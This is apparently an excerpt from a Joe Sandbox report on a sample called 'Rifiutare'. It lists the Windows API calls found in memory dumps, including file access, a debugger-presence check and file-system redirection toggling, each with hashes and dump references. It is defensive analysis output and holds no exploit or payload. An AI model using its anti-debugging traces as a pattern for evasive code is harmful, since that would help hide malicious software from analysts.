                                                                                  • Part of subcall function 00C63194: _free.LIBCMT ref: 00C631CB
                                                                                  • Part of subcall function 00C63194: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C56714,00000000), ref: 00C6320C
                                                                                  • Part of subcall function 00C63194: _abort.LIBCMT ref: 00C63212
                                                                                  • Part of subcall function 00C6CEFA: _abort.LIBCMT ref: 00C6CF2C
                                                                                  • Part of subcall function 00C6CEFA: _free.LIBCMT ref: 00C6CF60
                                                                                  • Part of subcall function 00C6CB6F: GetOEMCP.KERNEL32(00000000), ref: 00C6CB9A
                                                                                • _free.LIBCMT ref: 00C6CE53
                                                                                • _free.LIBCMT ref: 00C6CE89
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast_abort
                                                                                • String ID:
                                                                                • API String ID: 2991157371-0
                                                                                • Opcode ID: 054c0367aad093889319d64d22606bf0e7c9c255cc8c2d032178bb050bd54e15
                                                                                • Instruction ID: 292fff110eb6141b6b37132dd813c952612a893b7a8efd8e1a5b738ed79cf17e
                                                                                • Opcode Fuzzy Hash: 054c0367aad093889319d64d22606bf0e7c9c255cc8c2d032178bb050bd54e15
                                                                                • Instruction Fuzzy Hash: C931C231904208AFDB20EBA9D8C5BBDB7F5EF41720F210199E4549B291DB375E41EB80
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00C31153,?,00008000,00CCDBF4), ref: 00C331C3
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00C31153,?,00008000,00CCDBF4), ref: 00C73DC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 17df9ba7bbbef7fe6be2a3ba951862a64f2658e0ddc140bf38bb6ebba877419f
                                                                                • Instruction ID: 080eaccafcd3263533452ea879cb7f11d845676151df63a15a417d33fb850b5f
                                                                                • Opcode Fuzzy Hash: 17df9ba7bbbef7fe6be2a3ba951862a64f2658e0ddc140bf38bb6ebba877419f
                                                                                • Instruction Fuzzy Hash: 90019230185221B6E7311A26CC0EF9B7F98EF46B70F14C310FAA9AA1E0C7B45A54DB90
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00C32902
                                                                                  • Part of subcall function 00C328AB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C328C0
                                                                                  • Part of subcall function 00C328AB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C328D7
                                                                                  • Part of subcall function 00C3331E: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C3292D,?), ref: 00C3334E
                                                                                  • Part of subcall function 00C3331E: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C3292D,?), ref: 00C33361
                                                                                  • Part of subcall function 00C3331E: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D02408,00D023F0,?,?,?,?,?,?,00C3292D,?), ref: 00C333CD
                                                                                  • Part of subcall function 00C3331E: SetCurrentDirectoryW.KERNEL32(?,00000001,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C3344E
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C3293C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                • String ID:
                                                                                • API String ID: 1550534281-0
                                                                                • Opcode ID: f611584f3817c7b0664b2a61645d0b1ad887fdf7625e4be4b91d8a71d341d592
                                                                                • Instruction ID: e9995e361878990cef7d8e8372c1a0cb4e231457708239cbee2c64ed9698e076
                                                                                • Opcode Fuzzy Hash: f611584f3817c7b0664b2a61645d0b1ad887fdf7625e4be4b91d8a71d341d592
                                                                                • Instruction Fuzzy Hash: BFF082725617049FEB10BB61EC4EB6837A4A700711F00486AF549CA2F3CBB9A0549B60
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00CCDBF4,00C913AC,00000000,00000000,00000000,?,00CCDBF4,00CCDBF4,?,00C312BF,00CCDBF4,?,?), ref: 00C3B37D
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00C913AC,00000000,?,00000000,?,00CCDBF4,00CCDBF4,?,00C312BF,00CCDBF4,?,?), ref: 00C3B3B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 626452242-0
                                                                                • Opcode ID: 63ee3e7c57da3c5712be6c55bf4f9b178dbb1bed9380eae483e41d9eccf02cc2
                                                                                • Instruction ID: cc61ca3199a746f85c755600dad6bd686d33b29520adb8029eb1f835443f13c0
                                                                                • Opcode Fuzzy Hash: 63ee3e7c57da3c5712be6c55bf4f9b178dbb1bed9380eae483e41d9eccf02cc2
                                                                                • Instruction Fuzzy Hash: BC01F7753011007FEB18676ADC0BF7F7AADDB84350F14003DF602DA1E0EEA0AC009524
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48fd82238ca6f3158e951d5dc527e0eec64837891e28552b4d6fe5ee93e96ab8
                                                                                • Instruction ID: 71347365583f667a968add2176af9a181969227fedf7a86278daaf04929bf6f8
                                                                                • Opcode Fuzzy Hash: 48fd82238ca6f3158e951d5dc527e0eec64837891e28552b4d6fe5ee93e96ab8
                                                                                • Instruction Fuzzy Hash: 2FF1BE75D2021A9BCF14DF94C891AFEB7B5FF04300F64812AF912A7290EF349A89DB55
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 64d857c04a35d56f08a6ee074db4c57e7e112e8b3860f17e98d1ecdafffdcdb4
                                                                                • Instruction ID: 1b45e648610122bd2dc36f89415f04fbbb7ee70bc2012dd5eb4b403c1833f234
                                                                                • Opcode Fuzzy Hash: 64d857c04a35d56f08a6ee074db4c57e7e112e8b3860f17e98d1ecdafffdcdb4
                                                                                • Instruction Fuzzy Hash: FF51D779A00208AFEB18CF58C844BAD7BA5EF85365F19816CEC589B3A1C731DD87C754
                                                                                APIs
                                                                                  • Part of subcall function 00C3320E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3321A
                                                                                  • Part of subcall function 00C3320E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C3322C
                                                                                  • Part of subcall function 00C3320E: FreeLibrary.KERNEL32(00000000,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3323E
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C32C12
                                                                                  • Part of subcall function 00C331D7: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C331E0
                                                                                  • Part of subcall function 00C331D7: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C331F2
                                                                                  • Part of subcall function 00C331D7: FreeLibrary.KERNEL32(00000000,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C33205
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                • API String ID: 2632591731-0
                                                                                • Opcode ID: 7d9b642d7cf31ca2064cb3011229c1424fc5751e65f0438d0e6821c6e2864160
                                                                                • Instruction ID: 615ca456b167c5c16a631c7edff7675428859d5780142f819155866092a1845b
                                                                                • Opcode Fuzzy Hash: 7d9b642d7cf31ca2064cb3011229c1424fc5751e65f0438d0e6821c6e2864160
                                                                                • Instruction Fuzzy Hash: 9D110632610205ABDF25BF34DD02FAE77A5AF40711F10842DF552A71D1DE709B05BB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                • Opcode ID: 7c9f4400cd7eec457d2018fc328c1d42d40b7e8bb21a1057ef415371fe37fbf2
                                                                                • Instruction ID: 5ee0c5d97b5b7c218b30b67966533f53d4b8ac6ac3ce617f9ca298a1e26d5e91
                                                                                • Opcode Fuzzy Hash: 7c9f4400cd7eec457d2018fc328c1d42d40b7e8bb21a1057ef415371fe37fbf2
                                                                                • Instruction Fuzzy Hash: B8112A7590420AAFCF15DF98E98199B7BF4FF48310F104169F809AB351DA31EE15CB65
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00CCDBF4,00000000,?,?,00C32E8C,00CCDBF4,00010000,00000000,?,00000000,00000000), ref: 00C3851C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 0c2da2dd0aecd07cb35bf8a99826c966c7caf4f25a7fee5829445c828de0a1f7
                                                                                • Instruction ID: e531dcaca482abfd444171854f814a6bcc57eaba26327a80488d38dc987229a3
                                                                                • Opcode Fuzzy Hash: 0c2da2dd0aecd07cb35bf8a99826c966c7caf4f25a7fee5829445c828de0a1f7
                                                                                • Instruction Fuzzy Hash: F61136312007069FE721CE06D890F66B7E9BF44364F14C42EE9AA8AA51CB70F949CB24
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C333F5,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C345E7
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FullNamePath_wcslen
                                                                                • String ID:
                                                                                • API String ID: 4019309064-0
                                                                                • Opcode ID: ca7a74afcc3dccb51b4aa7a3413563d752853d980568d41b132bb7a0c30a4668
                                                                                • Instruction ID: 762a1d826b139f33d84c448369e3bad628ace28813094c1941d2cb9cb08b9917
                                                                                • Opcode Fuzzy Hash: ca7a74afcc3dccb51b4aa7a3413563d752853d980568d41b132bb7a0c30a4668
                                                                                • Instruction Fuzzy Hash: D6116171A242189BCB44EFA4D846EDA77B8AF08350F0040A5B959D7291DB70EB845B20
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b9f836960ab58fccbfac0efb01fc85afbfff16d2c470218f1775939f83e5553
                                                                                • Instruction ID: 926cf6d37d074203f9faf9b202250b63640e6378c1e69f2171620494db3f5ff6
                                                                                • Opcode Fuzzy Hash: 0b9f836960ab58fccbfac0efb01fc85afbfff16d2c470218f1775939f83e5553
                                                                                • Instruction Fuzzy Hash: 96F07D3A500A1057C7353A758C0575A3B99AF42372F104715FC30D21C1CF70DA4FB6A9
                                                                                APIs
                                                                                • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00CAF770
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentVariable
                                                                                • String ID:
                                                                                • API String ID: 1431749950-0
                                                                                • Opcode ID: 3de67c64129edeb3b5033419ebba72a6e9ec3e77774bac3bb7bb4e3566cbd2bf
                                                                                • Instruction ID: 763212b73b90a72b424ada5d788555d8fce54da1b9131e6fb537f19989ceef4d
                                                                                • Opcode Fuzzy Hash: 3de67c64129edeb3b5033419ebba72a6e9ec3e77774bac3bb7bb4e3566cbd2bf
                                                                                • Instruction Fuzzy Hash: 43F0AF75600205BFCB00EBA4CC4AE9F7BB8EF4A720F000054F905EB260EA70EE85DB61
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B,?,?,00C310E8,00CCDBF4), ref: 00C63C72
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 1e083dbb9a3475895865aa6a01548efe2c19f86dda6ff6cdb97bae1f2b46269b
                                                                                • Instruction ID: ff2186a47401917b8cf659c4b51089e65aecda289e6420269dc24c9e296001af
                                                                                • Opcode Fuzzy Hash: 1e083dbb9a3475895865aa6a01548efe2c19f86dda6ff6cdb97bae1f2b46269b
                                                                                • Instruction Fuzzy Hash: 3FE09B3220179576E73127B79D89F9E3A68AF427B0F150320FC25F6191DB60CF4052E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c6947689e0fd1542ab650d32e01e208c5c074bd6902f22ec40e33b306820a29b
                                                                                • Instruction ID: aaba916ce3c41479d495603a21a1b569ac2681cb925724b689299292536d58cf
                                                                                • Opcode Fuzzy Hash: c6947689e0fd1542ab650d32e01e208c5c074bd6902f22ec40e33b306820a29b
                                                                                • Instruction Fuzzy Hash: 43F03971111712CFDB349F65E494C1ABBE4BF14325324C97EE1EA82610C7319984EF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: __fread_nolock
                                                                                • String ID:
                                                                                • API String ID: 2638373210-0
                                                                                • Opcode ID: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
                                                                                • Instruction ID: bd2685b7f6f36cf90af4ded8f0cadbe62b317e2ab2ac96ae876b4676b33955c8
                                                                                • Opcode Fuzzy Hash: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
                                                                                • Instruction Fuzzy Hash: 95F0D47540020DBBDF05CF90C941A9A7B69FB04318F208585F9159A151C336EB61ABA1
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C332FF
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath_wcslen
                                                                                • String ID:
                                                                                • API String ID: 541455249-0
                                                                                • Opcode ID: 221c48251f4ce65b8184ecb452eedfa8739e6d0abd1a6e1982322605ab4ebec8
                                                                                • Instruction ID: f751ce81b3afd9c94bd49bc50ed06c59808f4194d74964d3470328ea02f1c16a
                                                                                • Opcode Fuzzy Hash: 221c48251f4ce65b8184ecb452eedfa8739e6d0abd1a6e1982322605ab4ebec8
                                                                                • Instruction Fuzzy Hash: 9FE0C272A002245BCB20A268DC06FEB77EDDFC8790F0440B5FD09D7358DA64ED80D690
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00C70B25,?,?,00000000,?,00C70B25,00000000,0000000C), ref: 00C707D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: d0fa2b50aa2a094936bbcce040a7922f5cb2de8ca76108a4db04d172450cebea
                                                                                • Instruction ID: 3400c213ec2719326640004106f3db7297ffac022323ec30b5000ed77267b730
                                                                                • Opcode Fuzzy Hash: d0fa2b50aa2a094936bbcce040a7922f5cb2de8ca76108a4db04d172450cebea
                                                                                • Instruction Fuzzy Hash: A4D06C3200010DBBDF028F85DD06EDE3BAAFB48714F014050FE1856020C732E821AB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
